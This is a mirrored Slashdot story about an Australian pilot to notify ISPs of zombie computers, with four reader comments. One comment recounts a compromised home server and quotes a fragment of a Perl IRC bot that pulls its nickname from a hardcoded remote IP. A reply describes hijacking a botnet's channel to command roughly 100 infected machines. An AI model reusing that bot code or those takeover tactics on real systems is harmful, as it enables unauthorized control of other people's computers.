Slashdot Mirror

← Back to Stories (view on slashdot.org)

AU Government To Pilot Target Zombies

Posted by Hemos on from the yeah-i-prefer-to-think-that-means-flesh-eaters-too dept.

msblack writes " Australian news sources are reporting that the communication regulators will begin notifying ISPs of infected customer computers. In a three-month pilot program, the Australian Communications & Media Authority will identify zombie computers and ask their owners to clean them or risk being disconnected. When will U.S. regulators and ISPs get on board?"

4 of 159 comments (clear)

  1. dangerous by Anonymous Coward · · Score: 5, Interesting

    and how long will it be before they ask my ISP to disconnect me because I'm running P2P software, making me a dangerous music thief?

    slippery slope!

  2. I got excited for a second by illtron · · Score: 5, Funny

    I got my hopes up for a second. I though, "Finally! Those fat cats in Canberra are taking some action to prepare for the immanant impending zombie pandemic."

    My elation was premature. This is just some lame story about computers sending spam.

    Come on people! We need to start stockpiling canned goods, fresh water and shotgun shells now! If we wait until the first reports of infection, it may already be too late!

    --
    Slashdot: 24 hours behind every other site or your money back!
  3. Why don't they target IRCops? by t0qer · · Score: 5, Interesting

    I'm a broke geek. I host my website on a machine on a machine in my house. Last few weeks i've caught my machine being used for zombie purposes. Attack vector was a vulerability in phpnuke.

    Let me explain "why I use that holy peice of shit"

    The website has a decent sized community. It's also going to be a pain in the butt transferring to something else (i'm thinking vbulletin) and i've never had a problem before the recent round of nuke upgrades. 3 according to the advisories the only patch is to get off phpnuke (again, wonderful)

    So today the website freezes up again. Thanks to the fact that i'm dot com broke now I basically sit here all day updating my forums, reading other forums, getting up ocassionally to warm up a microwave burrito and wait for the day Bill Gates makes all of us former window admins disapear to redmond in the great microsoft rapture of 2006.

    Ok.. SSH into the machine. Same as before, same exploit.

    poo:~# ls /tmp -al
    total 20
    drwxrwxrwt 5 root root 4096 Nov 6 14:55 .
    drwxr-xr-x 22 root root 4096 Sep 16 14:38 ..
    drwxrwxrwt 2 www www 4096 Nov 6 09:40 r0nin
    drwxrwxrwt 2 root root 4096 Nov 6 09:40 bot.txt
    drwxr-xr-x 2 root root 4096 Nov 6 10:00 enviar.pl

    Oh you sons of bitches, you done gone fucked with an admin with nothing better to do than to track you down. I firewalled off port 80, copied the offending files out of tmp and change permissions. Googling revealed r0nin is some kind of shell server. Since 80 and 22 are the only ports open to this machine, they would run it on 80, crashing my website.

    Then I looked at enviar.pl. It was just a stupid email script. Nothing notable.

    Finally I looked at bot.txt.

    # IRC
    my @adms=("bigfirex"); #nick dos administradores
    my @canais=("#testebot");
    use LWP::Simple;
    my $dados=get("http://66.185.162.241/...fusao/nick/in dex.php");
    my $nick=$dados; # nick do bot.. c o nick jah estiveh em uso.. vai aparece com um numero radonamico no final
    my $ircname = $dados;
    chop (my $realname = `uname -n`);
    $servidor='irc.igs.ca' unless $servidor; #servidor d irc q vai c usadu c naum for especificado no argumento
    my $porta='6667'; #porta do servidor d irc

    Ahh here it got interesting. I now had a IRC channel, with a room name. I tried connecting, but my machine was banned from the irc server.

    I ended up ssh'ing to a customer account I had running at he.net, and firing up BitchX from there. A few minutes later I was in the chatroom #testebot with our magical master of ceremonies "bigfirex"

    I sat there for a while seeing folks pop in and out. I asked the room "could you tell me exactly how you're exploiting my machine and would you please not do it again?" No answer from bigfirex.

    I decided to ask an IRCop for help. Surely seeing the evidence (I could have provided him shorewall and apache logs) he would take immidiate action banning this guy from the network.

    I did a /who 0 and found an IRC op from IGS.ca Below is a log of the chat I had with him.

    [msg(elsif)] hi are you an ircop?
    [elsif(jake@admin.igs.ca)] sure
    [msg(elsif)] someone on your network hacked my webserver and installed a bot, i tracked them back to here
    [msg(elsif)] The bot is being run by a user named .bigfirex. in a channel called #testebot.
    [elsif(jake@admin.igs.ca)] sucky. you do know that he.net runs a server on this network, irc.he.net?
    [msg(elsif)] actually im just using a shell i have there, the ip for my comprimised machine was banned from this
    network
    [elsif(jake@admin.igs.ca)] k. I don't know what I can really do for you. I don't know that person and all.
    [elsif(jake@admin.igs.ca)] lots of machines are compromised with ircbot trojans that come here in order to get their

    1. Re:Why don't they target IRCops? by ivan+kk · · Score: 5, Interesting

      By posting on slashdot, at least the odd geek or two will be sure to send off a few msgs to the ircops.

      However, it isn't their job to enforce controls that you deem necessary. We can use the example of bit torrent trackers. The irc server is like a bit torrent tracker. The owner/operator of the tracker is not responsibile for the torrents (in your case irc channels) that use his server/tracker. What's to stop the botnet operator from moving to another network?

      This actually happened to me once. One of my friends machines was r00ted, and he asked me to help him out. So what I did was to run lsof, to grab a list of opened files.
      I ran strings on some of the binaries I came across, found an irc channel, and joined it. When someone found out that I wasn't supposed to be their, I was kickbanned. I ssh'd to another machine, changed my ident and nick to match their patterns and joined the chan. I also spoke with the admin via pm, to find out what was going on etc.
      Turns out it was a couple of malaysian kids, running an irc server on a hacked machine with a carded domain name. They told me how the binary works, that it would only respond to a particular nickname, not requiring a password. I tried to change to that nick, and the services bot banned me.
      Connecting again from another IP, I realised services was running on a separate machine, and assuming hacked machines don't have the highest of stabilities, I joined the chan again, and wrote a script to disinfect all of the 100 or so other machines in the channel. So, armed with the knowledge I'd gathered from these kids after befriending them, and promising them several 0day exploits, and a stable shell (to run an irc server), I found out everything I needed to remove the program.
      Staying connected this time, the script would wait until the services bot dropped its connection, at which point I changed my nickname, told all 100 machines to edit their crontab, and to kill -9 the program. The malaysian kids came back, utterly disappointed that their efforts were wasted, removed the domain, killed the irc server, and haven't been heard from since (however they may have simply gotten better at what they did).

      Anyway, to bring a long story to a close, keep on tracking it, run the binary, or program from a machine you don't mind having compromised, sniff with ettercap, befriend your attackers (socially engineer them), and responsibly eliminate their arsenal, you'll save other admins the trouble (too bad they probably won't even know about it).
      Good luck with it.